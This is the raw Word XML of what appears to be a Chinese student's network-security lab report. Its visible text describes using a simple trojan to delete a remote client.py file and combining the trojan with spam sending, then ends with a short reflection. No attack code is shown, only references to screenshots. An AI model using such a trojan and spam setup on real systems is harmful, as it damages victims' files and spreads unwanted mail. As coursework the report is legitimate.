            <wp:extent cx="3292876" cy="374523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390" cy="37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1ED4" w14:textId="3FD1E32D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可以看到文件夹中的原有文件中包含client.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件，接下来使用d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令删除client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72051C39" w14:textId="575C5A91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761039D5" wp14:editId="67879497">
            <wp:extent cx="2048161" cy="66684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543B" w14:textId="52C30A55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可以看到client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件已经被删除：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F703905" w14:textId="3ACDD9AC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2BC5354" wp14:editId="6DD5B6AC">
            <wp:extent cx="2534004" cy="231489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8A0" w14:textId="2A338431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将简易木马与发送垃圾邮件相结合，运行该程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759FC75" w14:textId="651F992B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47797E37" wp14:editId="1AEBDA3A">
            <wp:extent cx="4363059" cy="20957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E602" w14:textId="7F3FD876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运行后可收到垃圾邮件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F601EFA" w14:textId="3A0C119F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408CF99C" wp14:editId="03DE1604">
            <wp:extent cx="2717755" cy="1652954"/>
            <wp:effectExtent l="0" t="0" r="698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7168" b="20492"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2739969" cy="16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CC49A6B" wp14:editId="00FB0C1B">
            <wp:extent cx="2384403" cy="165295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r="5935" b="21171"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2390413" cy="165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C1DF" w14:textId="0709A6A9" w:rsidR="008B7D18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使用exit命令进行退出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B4E34" w14:textId="01E8AA54" w:rsidR="008B7D18" w:rsidRPr="00053024" w:rsidRDefault="008B7D18" w:rsidP="00AB040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8B7D18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55DB0911" wp14:editId="4EF7C5FE">
            <wp:extent cx="2410161" cy="21338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C9F9" w14:textId="4FD0B42C" w:rsidR="001812C9" w:rsidRPr="00053024" w:rsidRDefault="00054118" w:rsidP="00053024">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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053024">
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验总结及心得体会</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C156E0A" w14:textId="220EF467" w:rsidR="005904F3" w:rsidRDefault="00053024" w:rsidP="005904F3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053024">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过本次实验，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>设计完成了与网络相关题目的基本功能要求，调试运行之后，我能够边演示边解释设计的思想、过程及采用的方法。除此以外，我还熟练掌握了相关的网络编程技术，掌握了漏洞扫描、网络流量的基本分析方法，能够掌握各种软件开发工具的使用过程及方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CAA9A3" w14:textId="5757151F" w:rsidR="004903FD" w:rsidRPr="00053024" w:rsidRDefault="004903FD" w:rsidP="002A355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在日后的学习实践中，我会多加练习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，学会使用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进行更加复杂的编程，以实现更加复杂，功能更加多样的程序。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004903FD" w:rsidRPr="0005302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28B7" w14:textId="77777777" w:rsidR="004402C9" w:rsidRDefault="004402C9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14C690F6" w14:textId="77777777" w:rsidR="004402C9" w:rsidRDefault="0044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0972" w14:textId="77777777" w:rsidR="001812C9" w:rsidRDefault="001812C9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8DBD" w14:textId="77777777" w:rsidR="001812C9" w:rsidRDefault="001812C9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5E3D" w14:textId="77777777" w:rsidR="004402C9" w:rsidRDefault="004402C9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="52B7316F" w14:textId="77777777" w:rsidR="004402C9" w:rsidRDefault="0044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162AF" w14:textId="77777777" w:rsidR="001812C9" w:rsidRDefault="001812C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702F" w14:textId="77777777" w:rsidR="001812C9" w:rsidRDefault="001812C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C8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B844F36"/>
    <w:lvl w:ilvl="0" w:tplc="809A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929D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59D7629F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6BF40"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5836BF4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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="59D7629F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59D7629F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A3620D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00D2D6DE"/>
    <w:lvl w:ilvl="0" w:tplc="6016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7D7350"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A154892E"/>
    <w:lvl w:ilvl="0" w:tplc="32A2C712">
      <w:start w:val="2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491C9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E578A86A"/>
    <w:lvl w:ilvl="0" w:tplc="15466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48072574">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1175193976">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1351762327">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="659696427">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1764298153">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1390953990">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1855991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MyMzA3MzQ0MGQwZjQ2NDhiZTYzZmZjZTAzNzY5ZDkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="009A7432"/>
    <w:rsid w:val="0001020F"/>
    <w:rsid w:val="00037501"/>
    <w:rsid w:val="00041EC5"/>
    <w:rsid w:val="00053024"/>
    <w:rsid w:val="00054118"/>
    <w:rsid w:val="00081640"/>
    <w:rsid w:val="000A0EC6"/>
    <w:rsid w:val="00107FED"/>
    <w:rsid w:val="00124ADF"/>
    <w:rsid w:val="00175322"/>
    <w:rsid w:val="001812C9"/>
    <w:rsid w:val="001970C8"/>
    <w:rsid w:val="001E758E"/>
    <w:rsid w:val="002076F1"/>
    <w:rsid w:val="00271303"/>
    <w:rsid w:val="00276070"/>
    <w:rsid w:val="002921B2"/>
    <w:rsid w:val="002A3556"/>
    <w:rsid w:val="002C4990"/>
    <w:rsid w:val="002F1D52"/>
    <w:rsid w:val="00304C2B"/>
    <w:rsid w:val="0034378B"/>
    <w:rsid w:val="003C1FE8"/>
    <w:rsid w:val="003D427C"/>
    <w:rsid w:val="003F3D2C"/>
    <w:rsid w:val="00436273"/>
    <w:rsid w:val="004402C9"/>
    <w:rsid w:val="0045415C"/>
    <w:rsid w:val="004903FD"/>
    <w:rsid w:val="004B4558"/>
    <w:rsid w:val="005904F3"/>
    <w:rsid w:val="005B2551"/>
    <w:rsid w:val="005C6534"/>
    <w:rsid w:val="005D2AA2"/>
    <w:rsid w:val="005E086D"/>
    <w:rsid w:val="006015D4"/>
    <w:rsid w:val="00667E90"/>
    <w:rsid w:val="0067624C"/>
    <w:rsid w:val="006A35CD"/>
    <w:rsid w:val="0070189F"/>
    <w:rsid w:val="0078711B"/>
    <w:rsid w:val="008B7D18"/>
    <w:rsid w:val="008D20BA"/>
    <w:rsid w:val="009A3833"/>
    <w:rsid w:val="009A7432"/>
    <w:rsid w:val="009B55A5"/>
    <w:rsid w:val="009C0654"/>
    <w:rsid w:val="009E44BF"/>
    <w:rsid w:val="00A46EA6"/>
    <w:rsid w:val="00A760C9"/>
    <w:rsid w:val="00AA492E"/>
    <w:rsid w:val="00AB0407"/>
    <w:rsid w:val="00B426A5"/>
    <w:rsid w:val="00B44035"/>
    <w:rsid w:val="00B65D0C"/>
    <w:rsid w:val="00BA270F"/>
    <w:rsid w:val="00C274DA"/>
    <w:rsid w:val="00C525AB"/>
    <w:rsid w:val="00C854F3"/>
    <w:rsid w:val="00CB10BD"/>
    <w:rsid w:val="00CC64F3"/>
    <w:rsid w:val="00CD4367"/>
    <w:rsid w:val="00CD4D18"/>
    <w:rsid w:val="00D429B8"/>
    <w:rsid w:val="00D431CB"/>
    <w:rsid w:val="00DF5FCD"/>
    <w:rsid w:val="00E91013"/>
    <w:rsid w:val="00EF2D10"/>
    <w:rsid w:val="00F209CC"/>
    <w:rsid w:val="00F32E2A"/>
    <w:rsid w:val="00FA6463"/>
    <w:rsid w:val="00FC0164"/>
    <w:rsid w:val="2C851B79"/>
    <w:rsid w:val="6394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4BBE4"/>
  <w15:docId w15:val="{A427EBE6-3C22-4BC5-BA19-1568E22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Pr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4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yang yang</cp:lastModifiedBy>
  <cp:revision>77</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-27T03:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-09T12:46:00Z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29006945E097489C8C85CB6F74521939</vt:lpwstr>
  </property>
</Properties>
</file>